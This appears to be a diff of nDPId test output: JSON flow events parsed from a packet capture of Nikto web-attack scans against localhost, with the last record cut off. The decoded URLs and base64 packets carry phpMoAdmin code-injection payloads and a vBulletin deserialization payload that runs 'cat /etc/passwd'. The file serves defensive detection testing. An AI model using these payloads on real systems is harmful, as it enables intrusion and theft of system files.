00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_packet_id":1,"flow_last_seen":1576420277986,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277986,"pkt":"AAAAAAAAAAAAAAAACABFAAFn4zdAAEAGWFd\/AAABfwAAAcfgH5C+u9puvhX1U4AYAED\/WwAAAQEICp1nAAqdZwAKR0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_packet_id":1,"flow_last_seen":1576420277988,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277988,"pkt":"AAAAAAAAAAAAAAAACABFAAFqP5xAAEAG++9\/AAABfwAAAcfiH5DrbgbETTZEsIAYAED\/XgAAAQEICp1nAAudZwALR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_packet_id":1,"flow_last_seen":1576420277989,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277989,"pkt":"AAAAAAAAAAAAAAAACABFAAFn5zlAAEAGVFV\/AAABfwAAAcfkH5BgZN5vdwnWyoAYAED\/WwAAAQEICp1nAA2dZwANR0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_packet_id":1,"flow_last_seen":1576420277991,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277991,"pkt":"AAAAAAAAAAAAAAAACABFAAFq2t9AAEAGYKx\/AAABfwAAAcfmH5C2ZOOFxq2Ns4AYAED\/XgAAAQEICp1nAA6dZwAOR0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01129{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7580000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_packet_id":1,"flow_last_seen":1576420277992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277992,"pkt":"AAAAAAAAAAAAAAAACABFAAFk9ANAAEAGR45\/AAABfwAAAcfoH5AH9M1coGd5OYAYAED\/WAAAAQEICp1nABCdZwAQR0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7580000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_packet_id":1,"flow_last_seen":1576420277993,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277993,"pkt":"AAAAAAAAAAAAAAAACABFAAFnZv1AAEAG1JF\/AAABfwAAAcfqH5D+xV+iBWcClIAYAED\/WwAAAQEICp1nABGdZwARR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} -01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +01126{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7580000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7580000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01249{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_packet_id":1,"flow_last_seen":1576420277997,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":644,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":644,"pkt_l4_len":610,"thread_ts_msec":1576420277997,"pkt":"AAAAAAAAAAAAAAAACABFAAJ2Zy1AAEAG01J\/AAABfwAAAcfuH5CyFV5xr3JzcYAYAEAAawAAAQEICp1nABWdZwAVR0VUIC92Yi9hamF4L2FwaS9ob29rL2RlY29kZUFyZ3VtZW50cz9hcmd1bWVudHM9TyUzQTEyJTNBJTIydkJfZEJfUmVzdWx0JTIyJTNBMiUzQSU3QnMlM0E1JTNBJTIyJTAwJTJBJTAwZGIlMjIlM0JPJTNBMTclM0ElMjJ2Ql9EYXRhYmFzZV9NeVNRTCUyMiUzQTElM0ElN0JzJTNBOSUzQSUyMmZ1bmN0aW9ucyUyMiUzQmElM0ExJTNBJTdCcyUzQTExJTNBJTIyZnJlZV9yZXN1bHQlMjIlM0JzJTNBNiUzQSUyMmFzc2VydCUyMiUzQiU3RCU3RHMlM0ExMiUzQSUyMiUwMCUyQSUwMHJlY29yZHNldCUyMiUzQnMlM0EyNSUzQSUyMnN5c3RlbSUyOCUyN2NhdCUyMCUyRmV0YyUyRnBhc3N3ZCUyNyUyOSUyMiUzQiU3RCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzA1OCkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01383{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7580000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 